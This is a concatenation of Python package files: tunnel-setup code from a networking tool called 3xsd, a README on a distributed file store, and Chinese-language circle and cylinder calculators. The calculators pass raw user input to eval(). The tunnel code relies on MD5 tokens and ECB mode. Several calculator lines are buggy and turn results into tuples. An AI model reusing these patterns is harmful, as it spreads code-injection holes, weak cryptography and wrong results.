self.sess_encrypt_mode[name] = AES.MODE_ECB
if name not in self.aes:
self.aes[name] = AES.new(self.e_token[name], AES.MODE_ECB)
elif _em == 'blowfish-cbc':
self.sess_encrypt_mode[name] = Blowfish.MODE_CBC + 100
elif _em == 'blowfish-cfb':
self.sess_encrypt_mode[name] = Blowfish.MODE_CFB + 100
elif _em == 'blowfish-ctr':
self.sess_encrypt_mode[name] = Blowfish.MODE_CTR + 100
if len(_em_zip) > 1:
if _em_zip[1] == 'zlib' or _em_zip[1] == 'compress':
self.compress_tunnel[name] = 'zlib'
elif _em_zip[1] == 'lzo':
self.compress_tunnel[name] = 'lzo'
if len(v) > 7:
if v[6]:
self.peer_ip[name] = v[6]
self.client_session[name] = True
if v[7]:
self.peer_port[name] = int(v[7])
else:
self.peer_port[name] = 9000
if len(v) > 8 or len(v) == 7:
self.tun_route[name] = []
for route in v[len(v) - 1].split(','):
if route:
if "ifup=" in route:
#not a 0.0.0.0/0 route, must be a ifup/ifdown script
self.ifup_script[name] = route[5:]
continue
if "ifdown=" in route:
self.ifdown_script[name] = route[7:]
continue
if "rtch=" in route:
self.rtch_script[name] = route[5:]
continue
if route.count('/') == 2:
_net, _mask, _s_metric = route.split('/')
route = ''.join([_net, '/', _mask])
_metric = int(_s_metric)
if route in self.route_metric_fixed:
self.route_metric_fixed[route][name] = _metric
else:
self.route_metric_fixed[route] = {name: _metric}
self.tun_route[name].append(route)
if route in self.route_metric:
self.route_metric[route][name] = len(self.route_metric[route]) + 1
else:
self.route_metric[route] = {name: 1}
def encrypt_token(self, session, token):
md5 = hashlib.md5()
md5.update(''.join([session, '#', token]))
return md5.hexdigest()
def init_handler(self):
pass
def connect_udt_server(self, target, new_port=None): #ctud
sock = udt.UdtSocket()
sock.setsockopt(udt4.UDT_RCVBUF, self.server.recv_buf_size) #default 10MB
sock.setsockopt(udt4.UDT_SNDBUF, self.server.send_buf_size) #default 10MB
if new_port:
_port = new_port
_allow_redirect = 0
else:
_port = self.peer_port[target]
if _port < 0:
_port = abs(_port)
_allow_redirect = 0
else:
_allow_redirect = 1
_peer_ip = socket.gethostbyname(self.peer_ip[target])
try:
#print "connecting udt server", self.peer_ip[target], str(_port)
sock.connect((_peer_ip, _port))
except:
sock.close()
return
_c_str = ''.join([target, ':', _peer_ip, ':', str(_port), ':', str(_allow_redirect)])
sock.send(struct.pack('!i', len(_c_str)))
sock.send(_c_str)
try:
_len = struct.unpack('!i', sock.recv(4))[0]
_my_ip = sock.recv(_len)
except:
sock.close()
return
#the _s_token used to verify the two sides has 4 factors: session_name, passwd(token), server_ip, client_ip
#this should be able to prevent from middleman attack & fake connect attempt
_s_token = self.encrypt_token(self.e_token[target], ''.join([_peer_ip, '#', _my_ip]))
sock.send(struct.pack('!i', len(_s_token)))
sock.send(_s_token)
try:
_result = -1
_result = struct.unpack('!i', sock.recv(4))[0]
except:
sock.close()
return
if _result == 0:
self.setup_tunnel(target, sock, (_peer_ip, _port))
self.connected[target] = True
self.server.udt_conns_cnt[self.server._worker_id].value += 1
elif _result == 1:
_len = struct.unpack('!i', sock.recv(4))[0]
_new_port_str = sock.recv(_len)
sock.close()
t = threading.Thread(target=self.connect_udt_server, args=(target,int(_new_port_str)))
t.daemon = True
t.start()
def setup_tunnel(self, session_name, conn, addr): #stst
try:
if not conn or not addr or not session_name: return
_do_relay = True if session_name in self.udt_relay else False
_tun = None
if not _do_relay:
_tun_name = ''.join([session_name, '.', str(self.server._worker_id)])
_tun = pytun.TunTapDevice(name=_tun_name, flags=pytun.IFF_TUN|pytun.IFF_NO_PI)
_tun.addr = self.tun_local_ip[session_name]
_tun.dstaddr = self.tun_peer_ip[session_name]
_tun.netmask = '255.255.255.255'
_tun.mtu = self.tun_mtu[session_name]
with open(os.devnull, 'w') as devnull:
subprocess.call(['ip', 'route', 'del', ''.join([_tun.dstaddr, '/', _tun.netmask])], stderr=devnull)
self.server.ztuns[_tun.fileno()] = _tun
self.server.s_tuns[_tun.fileno()] = session_name
_tun.up()
with open(os.devnull, 'w') as devnull:
subprocess.call(['ip', 'link', 'set', _tun_name, 'txqueuelen', str(self.tun_txqueue[session_name])], stderr=devnull)
if session_name in self.tun_route:
if self.tun_route[session_name]:
with open(os.devnull, 'w') as devnull:
for route in self.tun_route[session_name]: #rtrt
if route in self.route_metric:
if self.route_metric[route][session_name] == -1:
if len(self.route_metric[route]) > 1:
j = 0
for k in self.route_metric[route]:
if k == session_name:
break
else:
j += 1
self.route_metric[route][session_name] = 327670 + j
subprocess.call(['ip', 'route', 'add', route, 'metric', str(self.route_metric[route][session_name]), 'dev', _tun_name], stderr=devnull)
else:
self.route_metric[route][session_name] = 1
subprocess.call(['ip', 'route', 'add', route, 'metric', '1', 'dev', _tun_name], stderr=devnull)
else:
subprocess.call(['ip', 'route', 'add', route, 'metric', str(self.route_metric[route][session_name]), 'dev', _tun_name], stderr=devnull)
else:
subprocess.call(['ip', 'route', 'del', route], stderr=devnull)
subprocess.call(['ip', 'route', 'add', route, 'dev', _tun_name], stderr=devnull)
_ifup_script = self.ifup_script.get(session_name, None)
if _ifup_script:
with open(os.devnull, 'w') as devnull:
subprocess.call([_ifup_script, _tun_name], stderr=devnull)
self.server.s_udts[conn.UDTSOCKET.UDTSOCKET] = session_name
self.server.zsess[session_name] = (_tun, conn , addr)
self.tun_rtt[session_name] = -1
if self.encrypt or session_name in self.sess_encrypt_mode:
if session_name in self.sess_encrypt_mode:
_encrypt_mode = self.sess_encrypt_mode[session_name]
else:
_encrypt_mode = self.encrypt_mode
else:
_encrypt_mode = None
if session_name in self.compress_tunnel:
_compress = self.compress_tunnel[session_name]
else:
_compress = None
if self.io_mode == self.IO_NONBLOCK:
#io_mode == IO_NONBLOCK, single thread epoll to handle udt&tun events
if _tun:
flag = fcntl.fcntl(_tun.fileno(), fcntl.F_GETFL)
fcntl.fcntl(_tun.fileno(), fcntl.F_SETFL, flag | os.O_NONBLOCK)
conn.setblocking(False)
_n = conn.UDTSOCKET.UDTSOCKET % self.server.udt_thread_limit
if self.server.upolls[_n] is None:
self.server.upolls[_n] = udt.Epoll()
self.server.upolls[_n].add_usock(conn, udt4.UDT_EPOLL_IN)
self.udt_relay_thread_stat[session_name] = True
if not _do_relay:
self.server.upolls[_n].add_ssock(_tun, udt4.UDT_EPOLL_IN)
t = threading.Thread(target=self.server.handle_event_udt_tun, args=(_n,))
t.daemon = True
t.start()
else:
self.server.upolls[_n].add_usock(conn, udt4.UDT_EPOLL_IN)
self.udt_relay_thread_stat[session_name] = True
if not _do_relay:
self.server.upolls[_n].add_ssock(_tun, udt4.UDT_EPOLL_IN)
else:
#io_mode == IO_BLOCK (default), 2 threads bi-direction forwarding packages
if not _do_relay:
t = threading.Thread(target=self.server.forward_tun_udt,args=(_tun,conn,_encrypt_mode,_compress,session_name,))
t.daemon = True
t.start()
t = threading.Thread(target=self.server.forward_udt_tun,args=(_tun,conn,_encrypt_mode,_compress,session_name,))
t.daemon = True
t.start()
else:
t = threading.Thread(target=self.server.forward_udt_relay,args=(conn,session_name,))
t.daemon = True
t.start()
if _do_relay:
print "UDT relay tunnel", session_name, "launched, no tun device, io_mode:", self.io_mode
else:
print "UDT tunnel", session_name, "launched, local", _tun.addr, "peer", _tun.dstaddr, "mtu", _tun.mtu, "encryption:", _encrypt_mode, "compress:", _compress, "io_mode:", self.io_mode
except:
if conn:
try:
if self.io_mode == self.IO_NONBLOCK and self.server.upolls[conn.UDTSOCKET.UDTSOCKET % self.server.udt_thread_limit]:
self.server.upolls[conn.UDTSOCKET.UDTSOCKET % self.server.udt_thread_limit].remove_usock(conn)
except:
pass
try:
conn.close()
del conn
except:
pass
if _tun:
try:
if self.io_mode == self.IO_NONBLOCK and self.server.upolls[conn.UDTSOCKET.UDTSOCKET % self.server.udt_thread_limit]:
self.server.upolls[conn.UDTSOCKET.UDTSOCKET % self.server.udt_thread_limit].remove_ssock(_tun)
except:
pass
try:
_tun.down()
_tun.close()
del _tun
except:
pass
raise
def destroy_tunnel(self, session_name): #ddd
_tun, _conn, _addr = self.server.zsess.pop(session_name, (None, None, None))
self.connected.pop(session_name, None)
self.tun_rtt.pop(session_name, None)
if session_name in self.tun_route:
for _route in self.tun_route[session_name]:
self.route_metric[_route][session_name] = -1
if _tun:
print "Destroying", ''.join([session_name, '.', str(self.server._worker_id)]), _tun, _conn, _addr
else:
print "Destroying", ''.join([session_name, '.', str(self.server._worker_id)]), _conn, _addr
if _conn and _addr:
if _tun:
self.server.ztuns.pop(_tun.fileno(), None)
self.server.s_tuns.pop(_tun.fileno(), None)
self.server.s_udts.pop(_conn.UDTSOCKET.UDTSOCKET, None)
self.server.udt_conns_cnt[self.server._worker_id].value -= 1
if session_name in self.server.udt_send_buf:
self.server.udt_send_buf.pop(session_name)
if self.io_mode == self.IO_NONBLOCK:
try:
_n = _conn.UDTSOCKET.UDTSOCKET % self.server.udt_thread_limit
if self.server.upolls[_n]:
self.server.upolls[_n].remove_usock(_conn)
if _tun:
self.server.upolls[_n].remove_ssock(_tun)
except:
pass
try:
#revoke mem, does it work?
if _tun:
_tun.down()
_tun.close()
del _tun
_conn.close()
del _conn
del _addr
except:
pass
if session_name in self.udt_relay_thread_stat:
self.udt_relay_thread_stat[session_name] = False
_ifdown_script = self.ifdown_script.get(session_name, None)
if _ifdown_script:
with open(os.devnull, 'w') as devnull:
subprocess.call([_ifdown_script, ''.join([session_name, '.', str(self.server._worker_id)])], stderr=devnull)
def setup_udt_connection(self, conn, addr): #stud
try:
if not conn or not addr:
return
_len = 0
_len = struct.unpack('!i', conn.recv(4))[0]
if _len > 0:
_c_str = conn.recv(_len)
_session_name, _my_ip, _my_port_str, _allow_redirect_str = _c_str.split(':',3)
_peer_ip, _peer_port = addr
if _session_name not in self.session:
#no such session config
conn.close()
else:
conn.send(struct.pack('!i', len(_peer_ip)))
conn.send(_peer_ip)
_len = struct.unpack('!i', conn.recv(4))[0]
if _len > 0:
_s_token = conn.recv(_len)
if _s_token == self.encrypt_token(self.e_token[_session_name], ''.join([_my_ip, '#', _peer_ip])):
#pass, check idle worker
if _allow_redirect_str == '1':
#this value changed at every connection time
#_idle_port = self.server.wdd_idle_worker(int(_my_port_str))
#this value fixed for about 20 secs
_idle_port = self.server.udt_conn_port.value
else:
_idle_port = int(_my_port_str)
if _idle_port == int(_my_port_str):
#tell client, setup the tunnel, put conn in epoll
conn.send(struct.pack('!i', 0))
if _session_name in self.connected:
#only one tunnel per session
self.destroy_tunnel(_session_name)
self.setup_tunnel(_session_name, conn, addr)
self.connected[_session_name] = True
self.server.udt_conns_cnt[self.server._worker_id].value += 1
else:
#send redirect msg
conn.send(struct.pack('!i', 1))
conn.send(struct.pack('!i', len(str(_idle_port))))
conn.send(str(_idle_port))
conn.close()
else:
#sorry
conn.close()
except:
if conn:
try:
conn.close()
del conn
del addr
except:
pass
raise
def decrypt_package(self, _buf, _encrypt_mode, _session):
unpad = lambda s : s[0:-ord(s[-1])]
if _encrypt_mode == Blowfish.MODE_CBC + 100:
_blf = Blowfish.new(self.e_token[_session], _encrypt_mode - 100, _buf[:Blowfish.block_size])
return unpad(_blf.decrypt(_buf[Blowfish.block_size:]))
elif _encrypt_mode == Blowfish.MODE_CFB + 100:
_blf = Blowfish.new(self.e_token[_session], _encrypt_mode - 100, _buf[:Blowfish.block_size])
return _blf.decrypt(_buf[Blowfish.block_size:])
elif _encrypt_mode == Blowfish.MODE_CTR + 100:
_blf = Blowfish.new(self.e_token[_session], _encrypt_mode - 100, counter=Counter.new(64))
return _blf.decrypt(_buf)
elif _encrypt_mode == AES.MODE_CBC:
_aes = AES.new(self.e_token[_session], _encrypt_mode, _buf[:AES.block_size])
return unpad(_aes.decrypt(_buf[AES.block_size:]))
elif _encrypt_mode == AES.MODE_CFB:
_aes = AES.new(self.e_token[_session], _encrypt_mode, _buf[:AES.block_size])
return _aes.decrypt(_buf[AES.block_size:])
elif _encrypt_mode == AES.MODE_CTR:
_aes = AES.new(self.e_token[_session], _encrypt_mode, counter=Counter.new(128))
return _aes.decrypt(_buf)
else:
#AES.MODE_ECB
return unpad(self.aes[_session].decrypt(_buf))
def encrypt_package(self, _buf, _encrypt_mode, _session):
if _encrypt_mode == Blowfish.MODE_CBC + 100:
BS = Blowfish.block_size
pad = lambda s: ''.join([s, (BS - len(s) % BS) * chr(BS - len(s) % BS)])
_iv = Random.new().read(BS)
_blf = Blowfish.new(self.e_token[_session], _encrypt_mode - 100, _iv)
return ''.join([_iv, _blf.encrypt(pad(_buf))])
elif _encrypt_mode == Blowfish.MODE_CFB + 100: #CFB OFB CTR: padding is not required
_iv = Random.new().read(Blowfish.block_size)
_blf = Blowfish.new(self.e_token[_session], _encrypt_mode - 100, _iv)
return ''.join([_iv, _blf.encrypt(_buf)])
elif _encrypt_mode == Blowfish.MODE_CTR + 100:
_blf = Blowfish.new(self.e_token[_session], _encrypt_mode - 100, counter=Counter.new(64))
return _blf.encrypt(_buf)
elif _encrypt_mode == AES.MODE_CBC:
BS = AES.block_size
pad = lambda s: ''.join([s, (BS - len(s) % BS) * chr(BS - len(s) % BS)])
_iv = Random.new().read(BS)
_aes = AES.new(self.e_token[_session], _encrypt_mode, _iv)
return ''.join([_iv, _aes.encrypt(pad(_buf))])
elif _encrypt_mode == AES.MODE_CFB: #CFB OFB CTR: padding is not required
_iv = Random.new().read(AES.block_size)
_aes = AES.new(self.e_token[_session], _encrypt_mode, _iv)
return ''.join([_iv, _aes.encrypt(_buf)])
elif _encrypt_mode == AES.MODE_CTR:
_aes = AES.new(self.e_token[_session], _encrypt_mode, counter=Counter.new(128))
return _aes.encrypt(_buf)
else:
#AES.MODE_ECB
BS = AES.block_size
pad = lambda s: ''.join([s, (BS - len(s) % BS) * chr(BS - len(s) % BS)])
return self.aes[_session].encrypt(pad(_buf))
def handle_udt_tun_events(self, sets): #ooo
for u in sets[0]:
_un = u.UDTSOCKET.UDTSOCKET
if _un in self.server.s_udts:
_session = self.server.s_udts[_un]
else:
continue
_encrypt_mode = self.sess_encrypt_mode[_session] if _session in self.sess_encrypt_mode else self.encrypt_mode
_compress = self.compress_tunnel[_session] if _session in self.compress_tunnel else None
_magic = {'zlib':(''.join([chr(0x78), chr(0x9c)]), 2), 'lzo':(''.join([chr(0xf0), chr(0x0), chr(0x0)]), 3)}
_unzip = lambda s : eval(_compress).decompress(s) if _compress and _magic[_compress][0] in s[:_magic[_compress][1]] else s
_forward2_tun = lambda s : self.server.zsess[_session][0].write(_unzip(self.decrypt_package(s, _encrypt_mode, _session))) if _encrypt_mode else self.server.zsess[_session][0].write(_unzip(s))
_repack = lambda s : ''.join([struct.pack('!H', len(s)), s])
try:
#for i in xrange(10):
if _session not in self.udt_relay:
_forward2_tun(u.recv(struct.unpack('!H', u.recv(2))[0]))
else:
_from, _to = self.udt_relay[_session]
if _session == _from:
_to_s = _to
else:
_to_s = _from
_, _to_usock, _ = self.server.zsess.get(_to_s, (None, None, None))
if _to_usock:
#print "relaying tunnel", _session, "to", self.udt_relay[_session]
_buf = u.recv(struct.unpack('!H', u.recv(2))[0])
_to_usock.send(_repack(_buf))
else:
#relay two sides not full connected yet
continue
except udt4.UDTException as e:
if e[0] == udt4.EASYNCRCV:
#recv buffer empty, no more data to read
#print "recv", i, "packages from udt and write in", _t2 - _t1, "secs"
continue
elif e[0] == udt4.EASYNCSND:
#send buffer full, just for relaying case
if _to_s in self.server.udt_send_buf:
self.server.udt_send_buf[_to_s].append(_buf)
else:
self.server.udt_send_buf[_to_s] = deque([_buf])
_ux = _conn.UDTSOCKET.UDTSOCKET % self.server.udt_thread_limit
self.server.upolls[_ux].remove_usock(u)
self.server.upolls[_ux].add_usock(u, udt4.UDT_EPOLL_IN|udt4.UDT_EPOLL_OUT)
if u.getsockstate() > 5:
self.server.upolls[_un % self.server.udt_thread_limit].remove_usock(u)
self.udt_relay_thread_stat[_session] = False
except IOError as e:
if e.errno == errno.EINVAL:
#illegal data, maybe tunnel peer shutdown suddenly
continue
for u in sets[1]:
_un = u.UDTSOCKET.UDTSOCKET
if _un in self.server.s_udts:
_session = self.server.s_udts[_un]
else:
continue
if _session in self.server.udt_send_buf:
try:
u.send(self.server.udt_send_buf[_session][0])
self.server.udt_send_buf[_session].popleft()
if len(self.server.udt_send_buf[_session]) == 0:
self.server.udt_send_buf.pop(_session, None)
except:
if u.getsockstate() > 5:
self.server.udt_send_buf.pop(_session, None)
self.server.upolls[_un % self.server.udt_thread_limit].remove_usock(u)
else:
_ux = u.UDTSOCKET.UDTSOCKET % self.server.udt_thread_limit
self.server.upolls[_ux].remove_usock(u)
self.server.upolls[_ux].add_usock(u, udt4.UDT_EPOLL_IN)
for _tun in sets[2]:
if _tun.fileno() == -1: continue
_session = self.server.s_tuns[_tun.fileno()]
_, _conn = self.server.zsess[_session][:2]
_encrypt_mode = self.sess_encrypt_mode[_session] if _session in self.sess_encrypt_mode else self.encrypt_mode
_compress = self.compress_tunnel[_session] if _session in self.compress_tunnel else None
_zip = lambda s : eval(_compress).compress(s) if _compress and len(s) < _tun.mtu - 100 else s
_encrypt=lambda s : self.encrypt_package(_zip(s), _encrypt_mode, _session) if _encrypt_mode else _zip(s)
_repack = lambda s : ''.join([struct.pack('!H', len(s)), s])
try:
#for i in xrange(10):
_buf = _repack(_encrypt(_tun.read(_tun.mtu)))
_conn.send(_buf)
except IOError as e:
#no more tun data to read
#print "read", i+1, "packages from tun, and sent in", _t2 - _t1, "secs"
continue
except udt4.UDTException as e:
if e[0] == udt4.EASYNCSND:
#send buffer full
if _session in self.server.udt_send_buf:
self.server.udt_send_buf[_session].append(_buf)
else:
self.server.udt_send_buf[_session] = deque([_buf])
_ux = _conn.UDTSOCKET.UDTSOCKET % self.server.udt_thread_limit
self.server.upolls[_ux].remove_usock(_conn)
self.server.upolls[_ux].add_usock(_conn, udt4.UDT_EPOLL_IN|udt4.UDT_EPOLL_OUT) | 3xsd | /3xsd-0.0.26.tar.gz/3xsd-0.0.26/_3xsd.py | _3xsd.py |
3fs is designed to solve the problem of mass files storage at a cluster of servers, with simple HTTP protocol to access, easy to expand and none centralized architecture.
At internet, most files are stored at web servers, can access using base HTTP protocol: GET/HEAD/PUT/DELETE method. A cluster of servers with WebDAV support, and a set of "routing" servers(3fsd), together make up of a 3fs.
user ----- 3fsd ------ web server
|--------- .....
user ----- 3fsd ------ web server
|--------- web server
3fsd ------ .....
|--------- web server
Architecture is simple: 3fsd as a "router" or "proxy", locating the uri, forward it to corresponding storage server, return response to user and cache it. GET/HEAD will be forward unconditionally, PUT/DELETE will be forwarded only beening authorized(base on client ip).
URI location algorithm
Let's take an example, accessing a 3fs file /path/to/file should use a uri in this form:
http://a.net/_3fs_0/path/to/file
"_3fs" is called the 3fs prefix, uri with it inside, identifying a access to a 3fs file.
"_0", number 0 called stage number, range 0 to max of interger.
a set of server running for sometime, called a stage, it's a relatively fixed state. server numbers, configs, etc.
When you expand your cluster, let say: add some servers to expand storage capability, stage plus one, the adding servers belong to this stage. Plusing stage procedure should not rollback.
When a file been added to cluster, use the current stage num to make the uri. As above, /path/to/file beening added at stage 0.
In 3fs config, also has a item called "region". How many servers in your one stage? region=4096 means you can add/expand max 4096 servers at a time, it can infect the calculating algorithm, should be fixed in 3fs live time, be careful to chose it
Ok, here is how the location algorithm does:
/path/to/file will be calculated to a md5: b4a91649090a2784056565363583d067
assumed that region=256(FF), stage=0, and we have 10 servers at stage 0.
region mask FF0000000000000000000000000000, we got "b4", the first 2 hex num in md5.
0xb4=180, 180/(256/10) = 7.03125, rounded to 7, server 7(0-9), will have it.
Redundancy=2, we have 2 copy of data storaged. How to locate all of them?
As above, the second copy's location is at "a9", the second 2 hex num in md5, 6.601, rounded at server 6. If it's same with first one, just has the server num plus one, server 8 then.
In theory, with region=256, we can have redundancy=16, with region=4096, redundancy=10.
As you can see, at a stage, fixed number of servers, 3fsd can locate the file exactly, algorithm execution time O(1).
When expanding the cluster, old files with old stage num in uri, can be located normally, also the new files with new stage num.
When file is changed, it keeps the stage num original. When deleted and adding again, use the new stage num.
Of cause, a server can belong to different stage, server A can belong to stage 0,1,2, if it's capacity is power enough.
The pool=... config item, is a list of servers at different stage, should be kept fixed at stage level, let say, you can't add a server to a stage randomly, adding servers must leading the stage num to increase. It dosen't matter of the sequence of servers, 3fsd will sort them at stage level. | 3xsd | /3xsd-0.0.26.tar.gz/3xsd-0.0.26/README.3fs | README.3fs |
# 3yzh
A three-circle calculator, It contains Circle Circles and Cylinders.
It is in Chinese.If you konw how to speak and write or mean these,you can use
Now,you can Download and input python 3y and then it will running
Please comply with local laws and regulations,
User only has the right to use
The final interpretation belongs to the author
For mainland China only.
You can see or read the log in log.py
This means that you have read and agreed to all the above regulations.
Welcome Download and use! | 3y | /3y-2.6.4.tar.gz/3y-2.6.4/README.rst | README.rst |
from __init__ import *
pai2='π'
def part_yh():
#圆环部分
while True:
r1=input('请输入外圆半径:')#输入r1(外圆半经)
try:
r1=eval(r1)
except (IOError,ValueError,TypeError,SyntaxError,EOFError,NameError):
print('输入符号时注意是英文的,输入正确数字')
except ZeroDivisionError:
print('除数不能为0,emmm,2年级小孩都知道')
if r1<=0.00000000:
print('可能是你输入的数太小了\n1.内圆半径不允许大于等于外圆半径\n2.重新选择模式使用\n *注意外圆半径和内圆半径的顺序,上面是外圆半径')
print('2秒后切换模式')
dd(2)
break
r2=input('请输入内圆半径:')
try:
r2=eval(r2)
except (IOError,ValueError,TypeError,SyntaxError,EOFError,NameError):
print('输入符号时注意是英文的,输入正确数字')
except ZeroDivisionError:
print('除数不能为0,emmm,2年级小孩都知道')
if r2<=0.000000000:
print('可能是你输入的数太小了\n1.内圆半径不允许大于等于外圆半径\n2.重新选择模式使用\n *注意外圆半径和内圆半径的顺序,上面是外圆半径')
print('2秒后切换模式')
dd(2)
break
print('【圆环】')
aboutpi()
xxx=input('请输入(1,2,3,4,5)中的一个数字:')
print(' ')
try:
xxx=int(xxx)
except (IOError,ValueError,TypeError,SyntaxError,EOFError,NameError):
print('请输入正确的整数')
except ZeroDivisionError:
print('除数不能为0,emmm,2年级小孩都知道')
print(' ')
if xxx>5 or xxx<=0:
end1=sj.now()-start
print('即将\033[10;31m退出\033[0m,','本次使用时间:',end1,'\n程序将在5秒后关闭,谢谢使用')
dd(5)
tc('谢谢使用')
elif xxx==5:
print('-'*40)
print('0.1s后切换模式')
dd(0.1)
break
elif xxx==1:
Sr1=r1*r1*3.14 #外圆s
Sr2=r2*r2*3.14 #内圆s
S=Sr1-Sr2 #圆环s
C1=6.28*r1 #外圆周长
C2=6.28*r2 #内圆周长
if S>0:
dw()
print('=====计算结果=====')
print('圆环面积=','{:.6f}'.format(S))
print('外圆周长=','{:.6f}'.format(C1))
print('内圆周长=','{:.6f}'.format(C2))
print('外圆面积=','{:.7f}'.format(Sr1))
print('内圆面积=','{:.7f}'.format(Sr2))
else:
print('可能是你输入的数太小了\n1.内圆半径不允许大于等于外圆半径\n2.重新选择模式使用\n *注意外圆半径和内圆半径的顺序,上面是外圆半径')
print('1秒后切换模式')
dd(1)
break
elif xxx==2:
Sr1=r1*r1*pai1 #外圆s #6
Sr2=r2*r2*pai1 #内圆s #7
S=Sr1-Sr2 #圆环s #6
C1=2*pai1*r1 #外圆周长#6
C2=2*pai1*r2 #内圆周长 #6
if S>0:
dw()
print('=====计算结果=====')
print('圆环面积=','{:.6f}'.format(S))
print('外圆周长=','{:.6f}'.format(C1))
print('内圆周长=','{:.6f}'.format(C2))
print('外圆面积=','{:.7f}'.format(Sr1))
print('内圆面积=','{:.7f}'.format(Sr2))
else:
print('可能是你输入的数太小了\n1.内圆半径不允许大于等于外圆半径\n2.重新选择模式使用\n *注意外圆半径和内圆半径的顺序,上面是外圆半径')
print('1秒后切换模式')
dd(1)
break
elif xxx==3:
Sr1=r1*r1 #外圆s
Sr2=r2*r2#内圆s
S=Sr1-Sr2,6 #圆环s
C1=2*r1 #外圆周长
C2=2*r2#内圆周长
if S>0:
dw()
print('=====计算结果=====')
print('圆环面积=','{:.6f}'.format(S),pai2)
print('外圆周长=','{:.6f}'.format(C1),pai2)
print('内圆周长=','{:.6f}'.format(C2),pai2)
print('外圆面积=','{:.7f}'.format(Sr1),pai2)
print('内圆面积=','{:.7f}'.format(Sr2),pai2)
else:
print('可能是你输入的数太小了\n1.内圆半径不允许大于等于外圆半径\n2.重新选择模式使用\n *注意外圆半径和内圆半径的顺序,上面是外圆半径')
print('1秒后切换模式')
dd(1)
break
elif xxx==4:
defpi=input('请输入要自定义的π(大于等于3且小于3.2)->')
try:
defpi=eval(defpi)
except (IOError,ValueError,TypeError,SyntaxError,EOFError,NameError):
print('请输入正确的数字')
except ZeroDivisionError:
print('除数不能为0,emmm,2年级小孩都知道')
if defpi<3 or defpi >3.2:
print('0.3秒后切换模式')
dd(0.3)
break
if defpi >=3 and defpi <3.2:
print('最后结果精确到小数点后8位')
Sr1=r1*r1*defpi #外圆s
Sr2=r2*r2*defpi,8 #内圆s
S=Sr1-Sr2,8 #圆环s
C1=2*defpi,8 #外圆周长
C2=2*defpi*r2,8 #内圆周长
if S>0:
dw()
print('=====计算结果=====')
print('圆环面积=','{:.8f}'.format(S))
print('外圆周长=','{:.8f}'.format(C1))
print('内圆周长=','{:.8f}'.format(C2))
print('外圆面积=','{:.8f}'.format(Sr1))
print('内圆面积=','{:.8f}'.format(Sr2))
else:
print('可能是你输入的数太小了\n1.内圆半径不允许大于等于外圆半径\n2.重新选择模式使用\n *注意外圆半径和内圆半径的顺序,上面是外圆半径')
print('1秒后切换模式')
dd(1)
break
else:
end=sj.now()-start
print('即将\033[10;31m退出\033[0m,','本次使用时间:',end,'\n程序将在5秒后关闭,谢谢使用')
dd(5)
tc('谢谢使用') | 3y | /3y-2.6.4.tar.gz/3y-2.6.4/yh.py | yh.py |
from __init__ import *
pai2='π' #下面要用到,提前放上来
def part_yz():
while True:
r=input('请输入半径:')#半径输入
try:
r=eval(r)
except (IOError,ValueError,TypeError,SyntaxError,EOFError,NameError):
print('')
except ZeroDivisionError:
print('除数不能为0,emmm,2年级小孩都知道')
print('请使用正确符号或正确数字')
H=input('请输入高:')#高输入
try:
H=eval(H)
except (IOError,ValueError,TypeError,SyntaxError,EOFError,NameError):
print('请使用正确符号或正确数字')
except ZeroDivisionError:
print('除数不能为0,emmm,2年级小孩都知道')
print('【圆柱】')
aboutpi()
xxx=input('请输入(1,2,3,4,5)中的一个数字:')
print(' ')
try:
xxx=int(xxx)
except (IOError,ValueError,TypeError,SyntaxError,EOFError,NameError):
print('请输入有效数字')
except ZeroDivisionError:
print('除数不能为0,emmm,2年级小孩都知道')
if r<=0 or H<=0:
print('虽然输入成功,但是为什么弹出选择模式,自己想想为什么')
print('0.1秒后切换模式')
dd(0.1)
break
print(' ')
if xxx>5 or xxx<=0:
end1=sj.now()-start
print('即将\033[10;31m退出\033[0m,','本次使用时间:',end1,'\n程序将在5秒后关闭,谢谢使用')
dd(5)
tc('谢谢使用')
elif xxx==5:
print('-'*40)
print('切换模式')
print('0.1秒后切换模式')
dd(0.1)
break
elif xxx==1:
dw()
sU=r*r*3.14#上圆s
sD=sU*2#双圆s
d=2*r #直径
C=d*3.14 #周长
Sc=C*H #侧s
S=sD+Sc #表s
V=sU*H
if r<=0 and H<=0 or (S or C or Sc or sD or sU or d)<=0 : #if重点检查区域
print('请重新输入半径和高,因为其中一个小于0或者数太小了,就像0.0001这样的,所以停止运行了')
print('请选择模式,再次尝试运行')
dd(0.5)
break
elif r>0 and H>0:
dw()
print('======计算结果======')
print('当半径=',r,'直径=',d,'高=',H,'时')
print('\n一个圆的周长=','{:.7f}'.format(C))
print('一个圆的面积=','{:.7f}'.format(sU))
print('两个圆的面积=','{:.7f}'.format(sD))
print('圆柱的侧面积=','{:.7f}'.format(Sc))
print('圆柱的体积=','{:.7f}'.format(V))
print('圆柱的表面积=','{:.7f}'.format(S))
else:
print('重新输入半径和高,无需关闭')
print('如果下面没有弹出请输入半径和请输入高,请关闭后重新打开')
elif xxx==2:
sU=r*r*pai1#上圆s
sD=sU*2#双圆s
d=2*r #直径
C=d*pai1 #周长
Sc=C*H #侧s
S=sD+Sc #表s
V=sU*H
if r<=0 and H<=0 or (S or C or Sc or sD or sU or d)<=0 : #if重点检查区域
print('请重新输入半径和高,因为其中一个小于0或者数太小了,就像0.0001这样的,所以停止运行了')
print('请重新打开,再次尝试运行')
dd(0.5)
break
elif r>0 and H>0:
dw()
print('=====计算结果=====')
print('当半径=',r,'直径=',d,'高=',H,'时')
print('\n一个圆的周长=','{:.7f}'.format(C))
print('一个圆的面积=','{:.7f}'.format(sU))
print('两个圆的面积=','{:.7f}'.format(sD))
print('圆柱的侧面积=','{:.7f}'.format(Sc))
print('圆柱的体积=','{:.7f}'.format(V))
print('圆柱的表面积=','{:.7f}'.format(S))
else:
print('重新输入半径和高,无需关闭')
print('如果下面没有弹出请输入半径和请输入高,请重新打开')
elif xxx==3:
sU=r*r#上圆s
sD=sU*2#双圆s
d=2*r #直径
C=d #周长
Sc=C*H #侧s
S=sD+Sc #表s
V=sU*H
if r<=0 and H<=0 or (S or C or Sc or sD or sU or d)<=0 : #if重点检查区域
print('请重新输入半径和高,因为其中一个小于0或者数太小了,就像0.0001这样的,所以停止运行了')
print('请重新打开,再次尝试()运行')
dd(0.5)
break
elif r>0 and H>0:
dw()
print('=====计算结果=====')
print('当半径=',r,'直径=',d,'高=',H,'时')
print('\n一个圆的周长=','{:.7f}'.format(C),pai2)
print('一个圆的面积=','{:.7f}'.format(sU),pai2)
print('两个圆的面积=','{:.7f}'.format(sD),pai2)
print('圆柱的侧面积=','{:.7f}'.format(Sc),pai2)
